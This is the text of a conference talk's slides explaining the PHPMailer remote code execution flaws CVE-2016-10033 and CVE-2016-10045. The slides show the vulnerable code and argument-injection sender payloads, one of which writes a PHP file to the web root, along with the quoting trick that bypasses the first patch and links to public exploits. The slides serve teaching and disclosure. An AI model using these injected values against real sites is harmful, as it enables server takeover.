This presentation is from a previous talk of mine at Null Mumbai. It explains PHP Mailer Remote Code Execution with regards to CVE-2016-10033 and a bypass to the initial patch i.e. CVE-2016-10045.

1. PHP MAILER REMOTE CODE
EXECUTION
CVE-2016-10033, CVE-2016-10045
NEELU TRIPATHY

2. PHP MAILER
• Most Popular Code For Sending Email
From PHP!
• Used By Many Open-source Projects:
Wordpress, Drupal, 1crm, Sugar CRM,
Joomla! And Many More
• Cve-2016-10033
• Affected Versions : < 5.2.18
• Exploit Variants Available In Bash, PHP &
Python

3. Where To Look?
• To Exploit The Vulnerability An Attacker Could Target Common Website Components
Such As:
• Contact/Feedback Forms,
• Registration Forms,
• Password Email Resets
• And Others That Send Out Emails With The Help Of A Vulnerable Version Of ‘Phpmailer’
Class…

4. VULNERABLE CODE
protected function mailsend($header, $body)
{
$toarr = array();
foreach ($this->to as $toaddr) {
$toarr[] = $this->addrformat($toaddr);
}
$to = implode(', ', $toarr);
$params = null;
//this sets the smtp envelope sender which gets turned into a
return-path header by the receiver
if (!empty($this->sender)) {
$params = sprintf('-f%s', $this->sender);
}
if ($this->sender != '' and !ini_get('safe_mode')) {
$old_from = ini_get('sendmail_from');
ini_set('sendmail_from', $this->sender); }
$result = false;
if ($this->singleto and count($toarr) > 1) {
foreach ($toarr as $toaddr) {
$result = $this->mailpassthru($toaddr, $this-
>subject, $body, $header, $params);

5. What’s Next
• $Params = Sprintf('-f%s', $This->sender);
//Function.Mail.Php
• Public Function Setfrom($address, $Name = '', $Auto = True) //
Sender Address Verification
• RFC 3696 Specification: Allows Email To Contain Spaces
“Attacker Crafted Command As Email”@fakeemail.Com
$result = $this->mailpassthru($toaddr, $this-
>subject, $body, $header, $params);

6. CRAFTING THE VECTOR
"attacker -param2 -param3"@test.com
• arg no. 0 == [/usr/sbin/sendmail]
• arg no. 1 == [-t]
• arg no. 2 == [-i]
• arg no. 3 == [-fattacker -param2 -
param3@test.com]
"attacker " -param2 -param3"@test.com
• arg no. 0 == [/usr/sbin/sendmail]
• arg no. 1 == [-t]
• arg no. 2 == [-i]
• arg no. 3 == [-fattacker]
• arg no. 4 == [-param2]
• arg no. 5 == [-param3"@test.com]

7. FINAL SEND(ER)
• $email_from = '"attacker" -oq/tmp/ -
x/var/www/cache/phpcode.php
some"@email.com';
• $msg_body = "<?php phpinfo(); ?>";
//can't use additional_parameters in safe_mode
//@link
http://php.net/manual/en/function.mail.php
if (ini_get('safe_mode') or !$this-
>usesendmailoptions or is_null($params)) {
$result = @mail($to, $subject,
$body, $header);
} else {
$result = @mail($to, $subject,
$body, $header, $params);
}

8. EXECUTION

9. DEMO RUN

10. CVE-2016-10045
PATCH
Sanitize $Sender > Apply
Escapeshellarg() :
Escaping Before The Value Is Passed
To Mail()
escapeshellarg() escapeshellcmd()
https://legalhackers.com/advisories/PHPMailer-
Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-
Patch-Bypass.html

11. Phpmailer 5.2.18-19
• Extra Quote
• Patched But Vulnerable: Phpmailer
5.2.18-19
• $Mail-
>setfrom(""attacker' -
Param2 -Param3"@test.Com",
'Client Name');
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-f"Attacker]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com']
Modified Attacker Code

12. REFERENCES
• https://github.com/PHPMailer/PHPMailer
• https://legalhackers.com/advisories/phpmailer-exploit-
remote-code-exec-cve-2016-10045-vuln-patch-bypass.html
• https://www.exploit-db.com/exploits/40968/
• https://www.exploit-db.com/exploits/40969/
• https://github.com/opsxcq/exploit-cve-2016-10033
• https://legalhackers.com/advisories/phpmailer-exploit-
remote-code-exec-cve-2016-10033-vuln.html
THANK YOU!